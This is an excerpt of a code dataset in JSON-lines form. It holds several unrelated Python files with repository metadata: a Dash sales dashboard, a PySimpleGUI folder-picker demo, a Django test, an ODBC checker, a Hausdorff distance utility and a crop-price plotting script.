\"margin-top\":\"2vh\",\n \"margin-left\":\"20vw\",\n \"margin-bottom\":\"2vh\",\n }\n ),\n ],\n style={\n \"background-color\":\"#1C2026\",'box-shadow':'6px 6px 6px grey',\"width\":\"100vw\"\n }),\n dbc.Row([\n dbc.Col(\n dbc.Card(\n [\n html.Br(),\n html.H2(\n 'Swiss Sales Dashboard',\n style={\n 'font-size':'32px',\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold',\n \"margin-top\":\"6vh\",\n \"color\":\"#3C799D\"\n }\n ),\n pcard,\n html.Br(),\n dbc.Button(\n id=\"map\",\n children=[\n html.I(className=\"fa fa-map-pin\"),\n \" Sales Map\"\n ],\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"#3C799D\",\n \"height\":\"8vh\",\n \"font-size\":\"24px\",\n \"margin-top\":\"7vh\",\n 'font-family':\"'Paytone One'\"\n }\n ),\n dbc.Button(\n id=\"chart\",\n children=[\n html.I(className=\"fa fa-line-chart\"),\n \" Sales Statistics\"\n ],\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"#3C799D\",\n \"font-size\":\"24px\",\n \"height\":\"10vh\",\n 'font-family':\"'Paytone One'\"\n }\n ),\n # dbc.Button(id=\"report\",children=[html.I(className=\"fa fa-file-text\"),\" Generate Report\"], color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\", \"font-size\":\"24px\",\"height\":\"10vh\",'font-family':\"'Paytone One'\"}),\n # dbc.Button(id=\"report\",children=[\"Logout\"], color=\"rgba(0,0,0,0)\",style={\"color\":\"red\", \"font-size\":\"24px\",\"height\":\"10vh\",'font-family':\"'Paytone One'\", \"border\":\"3px\"}),\n dbc.Button(\n id=\"report\",\n children=[\"Logout\"],\n external_link=True,\n href=\"https://www.gwcustom.com/copy-of-home\",\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"red\",\n \"font-size\":\"24px\",\n \"height\":\"10vh\",\n 'font-family':\"'Paytone One'\",\n \"border\":\"3px\"\n }\n ),\n dbc.ButtonGroup(\n [dbc.Button([html.I(className=\"fa fa-linkedin-square\")],external_link=True, href=\"https://www.linkedin.com/in/griffin-#3C799D-3aa20918a/\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"}),\n dbc.Button([html.I(className=\"fa fa-google\")],external_link=True, href=\"https://www.gwcustom.com/\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"}),\n dbc.Button([html.I(className=\"fa fa-github\")],external_link=True, href=\"https://github.com/GriffinWhitePortfolio\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"})],\n style={\"margin-left\":\"2vw\", \"margin-right\":\"2vw\", \"margin-top\":\"4vh\"}\n )\n # html.Shadow(dcc.RangeSlider(2000, 2022, 2, value=[2000, 2021], id='years'))\n\n ],style={\"height\":\"100vh\",'background-color':'#1F2732', 'box-shadow':'6px 6px 6px grey',\"position\":\"sticky\"}\n ),\n style={'textAlign': 'center'},\n width=3\n ),\n dbc.Col(\n id=\"main-out\",\n children=[\n dbc.Card([\n html.H1(\n [\n \"Swiss Sales Map \",\n html.I(className=\"fa fa-info-circle\")\n ],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Card(\n id=\"main-graph\",\n children=[\n dcc.Graph(figure=fig,\n style={\n \"height\":\"75vh\",\n \"width\":\"70vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n 'box-shadow':'6px 6px 6px grey'\n }\n )\n ],\n style={\n \"background-color\":'rgba(0,0,0,0)',\n \"margin-top\":\"2vh\",\n \"margin-left\":\"2vw\",\n \"border-radius\":\"30px\"\n }\n )],\n width=9,\n style={}\n )\n ])\n# ],style={'background-image':'url(/assets/bg.jpg)','height':'100vh', 'width':'100vw'})\n],style={'background-color':'#2B323D','height':'110vh', 'width':'100vw'})\n\n\n\n@app.callback(\n Output(\"main-out\",\"children\"),\n [Input(\"map\",\"n_clicks\"),\n Input(\"chart\",\"n_clicks\"),\n Input(\"report\",\"n_clicks\"),\n Input(\"main-out\",\"children\")])\ndef main_out(map, chart, report, current):\n\n trigger = callback_context.triggered[0]['prop_id']\n print(trigger)\n\n if trigger == \"map.n_clicks\":\n send = [\n dbc.Card(\n [html.H1([\n \"Swiss Sales Map \",\n html.I(className=\"fa fa-info-circle\")],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Card(\n id=\"main-graph\",\n children=[\n dcc.Graph(figure=fig,\n style={\n \"height\":\"75vh\",\n \"width\":\"70vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n 'box-shadow':'6px 6px 6px grey'\n }\n )\n ],\n style={\n \"background-color\":'rgba(0,0,0,0)',\n \"margin-top\":\"2vh\",\n \"margin-left\":\"2vw\",\n \"border-radius\":\"30px\"\n }\n )]\n elif trigger == \"chart.n_clicks\":\n send = [\n dbc.Card(\n [\n html.H1(\n [\n \"Swiss Sales Statistics \",\n html.I(className=\"fa fa-info-circle\")\n ],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )\n ],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=pie\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )\n ], width=4),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([\n daq.Gauge(\n color={\"gradient\":True,\"ranges\":{\"red\":[0,0.6],\"yellow\":[0.6,0.8],\"green\":[0.8,1]}},\n value=0.6,\n label={'label':'Sales to Inventory Ratio','style':{\"font-size\":\"22px\",\"margin-top\":\"1vh\"}},\n max=1,\n min=0,\n )\n ],\n width=9),\n dbc.Col([\n html.H1(\"0.6\",\n style={\n \"color\":\"yellow\",\n \"font-size\":\"32px\",\n \"margin-top\":\"10vh\"\n }\n )\n ],\n width=3)\n ])\n ],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )], width=4),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([\n daq.Gauge(\n color={\"gradient\":True,\"ranges\":{\"red\":[0,0.6],\"yellow\":[0.6,0.8],\"green\":[0.8,1]}},\n value=0.864,\n label={'label':'Industry Percentile','style':{\"font-size\":\"22px\",\"margin-top\":\"1vh\"}},\n max=1,\n min=0,\n )\n ],width=9),\n dbc.Col([\n html.H1(\"0.86\",\n style={\n \"color\":\"green\",\n \"font-size\":\"32px\",\n \"margin-top\":\"10vh\"\n }\n )\n ],\n width=3)\n ])\n ],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )],\n width=4\n ),],\n style={\n \"margin-right\":\"4vw\",\n \"margin-left\":\"4vw\",\n \"margin-top\":\"6vh\"\n }\n ),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=fig3\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"margin-top\":\"3vh\"\n }\n )], width=5\n ),\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=fig4\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"margin-top\":\"3vh\"\n }\n )\n ],width=7)\n ],\n style={\n \"margin-bottom\":\"20vh\",\n \"margin-right\":\"4vw\",\n \"margin-left\":\"4vw\",\n \"margin-top\":\"3vh\"\n }\n )]\n # elif trigger == \"report.n_clicks\":\n # # send = [dbc.Card([html.H1([\"Swiss Sales Report Generation \", html.I(className=\"fa fa-info-circle\")], style={'font-size':'26px',\"margin-left\":\"8vw\", \"bg-color\":\"rgba(0,0,0,0)\"})],style={\"margin-top\":\"8vh\", \"background-color\":\"rgba(0,0,0,0)\",'font-family':\"'Paytone One'\", 'font-weight':'bold', \"border-radius\":\"20px\"}),]\n # #3C799D\n else:\n send = current\n\n return send\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "grawfin/SwissSales", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 20833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "chart_studio.tools.set_credentials_file", "line_number": 13, "usage_type": "call"}, {"api_name": "chart_studio.tools", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 31, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 31, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 32, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 32, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 33, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 33, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 55, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 55, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 85, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 85, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 116, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 136, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 136, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scattermapbox", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 139, "usage_type": "name"}, {"api_name": "plotly.graph_objects.scattermapbox.Marker", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.graph_objects.scattermapbox", "line_number": 144, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 144, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.Mapbox", "line_number": 154, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 154, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.mapbox.Center", "line_number": 158, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 158, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 158, "usage_type": "name"}, {"api_name": "dash.Dash", "line_number": 174, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.themes", "line_number": 176, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.icons", "line_number": 177, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 185, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 187, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardImg", "line_number": 188, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 198, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 199, "usage_type": "call"}, {"api_name": "dash_html_components.Small", "line_number": 206, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 234, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 248, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 249, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 250, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 252, "usage_type": "call"}, {"api_name": "dash_html_components.H2", "line_number": 253, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 264, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 265, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 268, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 283, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 296, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ButtonGroup", "line_number": 310, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 311, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 311, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 313, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 313, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 323, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 346, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 349, "usage_type": "call"}, {"api_name": "dash.callback_context.triggered", "line_number": 382, "usage_type": "attribute"}, {"api_name": "dash.callback_context", "line_number": 382, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 387, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 388, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 390, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 408, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 426, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 428, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 431, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 448, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 449, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 450, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 451, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 464, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 465, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 466, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 467, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 468, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 477, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 478, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 498, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 499, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 500, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 501, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 502, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 510, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 511, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 539, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 540, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 541, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 542, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 555, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 556, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 557, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 375, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 376, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 377, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 378, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 379, "usage_type": "call"}]}
+{"seq_id": "22023493960", "text": "import PySimpleGUI as sg\n\n# Custom theme for a more appealing GUI\nsg.theme('DarkAmber')\n\n# Event handler for the \"Select All\" button\ndef select_all():\n for i in range(10):\n window[f'checkbox_{i}'].update(True)\n\n# Event handler for the \"Deselect All\" button\ndef deselect_all():\n for i in range(10):\n window[f'checkbox_{i}'].update(False)\n\n# Define the layout of the GUI\nlayout = [\n [sg.Text(\"Folder 1: \"), sg.Input(key='folder_path_1'), sg.FolderBrowse(button_text='Fetch Folder 1', key='button_1')],\n [sg.Text(\"Folder 2: \"), sg.Input(key='folder_path_2'), sg.FolderBrowse(button_text='Fetch Folder 2', key='button_2')],\n [sg.Button('Select All'), sg.Button('Deselect All')],\n [sg.Text('Fruits:', font='Helvetica 12 bold')]\n]\n\nfruits = ['apple', 'banana']\n\n# Add fruit labels with icons to the layout\nfor i, fruit in enumerate(fruits):\n icon = f'{fruit}.png' # Assuming you have fruit icons in a folder named \"icons\"\n full_size_icon = sg.Image(icon, size=(64, 64))\n layout.append([sg.Image(icon, size=(32, 32), tooltip=full_size_icon), sg.Text(fruit, key=f'fruit_{i}', font='Helvetica 12'), sg.Checkbox('', key=f'checkbox_{i}')])\n\nlayout.append([sg.Button('Submit', size=(10, 1), font='Helvetica 12')])\n\n# Create the GUI window with title\nwindow = sg.Window('Android Forensics', layout)\n\n# Event loop to process events and get the values from the GUI elements\nwhile True:\n event, values = window.read()\n\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'button_1':\n folder_path = sg.popup_get_folder(\"Select a folder\")\n if folder_path:\n window['folder_path_1'].update(folder_path)\n elif event == 'button_2':\n folder_path = sg.popup_get_folder(\"Select a folder\")\n if folder_path:\n window['folder_path_2'].update(folder_path)\n elif event == 'Select All':\n select_all()\n elif event == 'Deselect All':\n deselect_all()\n elif event == 'Submit':\n folder_path_1 = values['folder_path_1']\n folder_path_2 = values['folder_path_2']\n selected_fruits = [fruits[i] for i in range(10) if values[f'checkbox_{i}']]\n sg.popup(f\"Folder 1: {folder_path_1}\\nFolder 2: {folder_path_2}\\nSelected Fruits: {selected_fruits}\")\n\n# Close the GUI window\nwindow.close()\n", "repo_name": "vdmondkr2002/AndroDetective", "sub_path": "temp.py", "file_name": "temp.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySimpleGUI.theme", "line_number": 4, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 20, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 21, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 29, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Checkbox", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 32, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 35, "usage_type": "call"}, {"api_name": "PySimpleGUI.WINDOW_CLOSED", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PySimpleGUI.popup_get_folder", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.popup_get_folder", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.popup", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "16288198755", "text": "from django.test import TestCase\n\n# Create your tests here.\n\nfrom .models import *\nfrom django.utils import timezone\n\n\nclass ModelTestCase(TestCase):\n def setUp(self):\n q = Question.objects.create(\n question_text=\"To be or not to be, THAT is the question.\",\n pub_date=timezone.now(),\n )\n Choice.objects.create(question=q, choice_text=\"To be\")\n\n def test_question(self):\n q = Question.objects.get(\n question_text=\"To be or not to be, THAT is the question.\"\n )\n self.assertEqual(q.was_published_recently(), True)\n", "repo_name": "EdenWuyifan/swe1-app", "sub_path": "mysite/polls/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "14498891457", "text": "import argparse\nimport sys\n\nfrom tester import ODBCTester\n\nif __name__ == '__main__':\n desc = \"Usa el comando -p para indicar la ruta a un archivo .mdb (Microsoft Access Database) para comprobar \" \\\n \"que se puede leer/usar odbc. En caso contrario lanzara una excepcion de lo que ha ocurrido.\\n\"\n\n parser = argparse.ArgumentParser(description='Comprueba que exista odbc valido instalado.',\n epilog=desc)\n parser.add_argument('-p', '--path', help='Ruta a archivo .mdb', required=True)\n args = vars(parser.parse_args(None if sys.argv[1:] else ['-h']))\n\n if args['path']:\n tester = ODBCTester(args['path'])\n tester.run()\n else:\n print(\"Falta ruta de archivo .mdb\")\n", "repo_name": "Nestorm18/odbcTester", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tester.ODBCTester", "line_number": 16, "usage_type": "call"}, {"api_name": "tester.run", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36026649464", "text": "\"\"\"\nModified Hausdorff distance computation based on code from the omniglot repository:\nhttps://github.com/brendenlake/omniglot/tree/master/python/one-shot-classification\n\"\"\"\n\nimport torch\n\n\ndef mod_hausdorff_distance(item1: torch.Tensor, item2: torch.Tensor) -> torch.Tensor:\n\t\"\"\"\n\tModified Hausdorff Distance\n\n\tM.-P. Dubuisson, A. K. Jain (1994). A modified hausdorff distance for object matching.\n\tInternational Conference on Pattern Recognition, pp. 566-568.\n\n\tArgs:\n\t\titem1: [n, 2] coordinates of \"inked\" pixels\n\t\titem2: [m, 2] coordinates of \"inked\" pixels\n\n\tReturns:\n\t\tcomputed distance\n\n\t\"\"\"\n\td = torch.cdist(item1, item2)\n\tmindist_1, _ = d.min(axis=1)\n\tmindist_2, _ = d.min(axis=0)\n\tmean_1 = torch.mean(mindist_1, dim=0)\n\tmean_2 = torch.mean(mindist_2, dim=0)\n\n\treturn torch.maximum(mean_1, mean_2)\n\n\ndef binary_image_to_points(img: torch.Tensor, invert=False) -> torch.Tensor:\n\t\"\"\"\n\tConvert (~binary) image tensor to a list of mean-centred coordinates of the non-zero pixels.\n\n\tArgs:\n\t\timg: [1, H, W] the image tensor\n\t\tinvert: if true the input image will be inverted (e.g. when strokes are assumed to be zero and background one)\n\n\tReturns:\n\t\tthe mean-centred coordinates\n\n\t\"\"\"\n\n\tif invert:\n\t\timg = torch.logical_not(img.squeeze(0))\n\telse:\n\t\timg = img.squeeze(0)\n\n\tcoords = torch.nonzero(img).float()\n\tcoords = coords - coords.mean(dim=0)\n\n\treturn coords\n", "repo_name": "jonhare/DifferentiableSketching", "sub_path": "dsketch/utils/mod_haussdorff.py", "file_name": "mod_haussdorff.py", "file_ext": "py", "file_size_in_byte": 1366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.cdist", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.maximum", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.logical_not", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "2516633466", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 16:40:57 2018\n\n@author: LFVARGAS\n\"\" \n\nThis a simple report script for visualize all the crops commodities join in one graphic all the \ninstutions that sell this product, then two study how is the general behavior of each crop\n\nthe results were tree pdf reports CommoditiesTS_.pdf\nCrops are ordered by the number of records, descending so you will see the most populated in the first plot\n\"\"\"\n\nimport os,sys\nsys.path.append('../Factory')# commodity folder \n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom Commodity import Commodity\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\n#Constans\nos.chdir(\"../\")#AFFECT ALL THE EXETCUTION\n\nRELATIVE_PATH=\"./data/Cleaned/\"\n\nFILE_NAME= RELATIVE_PATH+\"Monthly_data_cmo_step2\"\nFILE_FORMAT=\".csv\"\nGrouperColumns=[\"CommodityId\"]\n\nDF_Month= pd.read_csv(\"./%s%s\"%(FILE_NAME,FILE_FORMAT))\nDF_Month[\"date\"]=pd.to_datetime(DF_Month[\"date\"], format='%Y-%m-%d')\n\n#DF_Month=DF_Month[DF_Month[\"CommodityId\"]==26]\n#DF_Month=DF_Month[DF_Month[\"APMC\"]==\"Barshi\"]\n\n\ncommodityManager=Commodity()\n\n\n\n\n\ndef viewPlotsTS(DataFrame_View,myColumnValue):\n by_group = DataFrame_View.groupby(GrouperColumns)\n \n by_group=sorted(by_group, # iterates pairs of (key, corresponding subDataFrame)\n key=lambda x: len(x[1]), # sort by number of rows (len of subDataFrame)\n reverse=True) # reverse the sort i.e. largest first\n \n i=0\n MAX_I=99999\n \n pdf= PdfPages('./Reports/CommoditiesTS_%s.pdf'%(myColumnValue))\n \n for name, group in by_group:\n \n group=group.sort_values(\"date\")\n \n \n fig, ax = plt.subplots(figsize=(20, 8))\n \n realName= commodityManager.getNameById(name)\n plt.title(str(name)+\"-\"+realName+\"-TS Plot\")\n #for this comodity which is the APMC associated\n apmcs=group[\"APMC\"].unique()[:15]\n \n for index,item in enumerate(apmcs):\n groupFiltered=group[group[\"APMC\"]==item]\n groupFiltered=groupFiltered.sort_values(\"date\")\n plt.plot(groupFiltered[\"date\"], groupFiltered[myColumnValue], label=item) \n \n ax.legend(loc='best')\n \n \n pdf.savefig() # saves the current figure into a pdf page\n \n \n i=i+1\n \n if(i==MAX_I):\n break\n \n pdf.close()\n #plt.show()\n\n\nviewPlotsTS(DF_Month,\"min_price\")\nviewPlotsTS(DF_Month,\"max_price\")\nviewPlotsTS(DF_Month,\"modal_price\")", "repo_name": "felipe-vargas-inrae/CropCommodityChallenge", "sub_path": "PreprocessingExploration/PlotByCommodity.py", "file_name": "PlotByCommodity.py", "file_ext": "py", "file_size_in_byte": 2531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 37, "usage_type": "call"}, {"api_name": "Commodity.Commodity", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 59, "usage_type": "call"}, {"api_name": 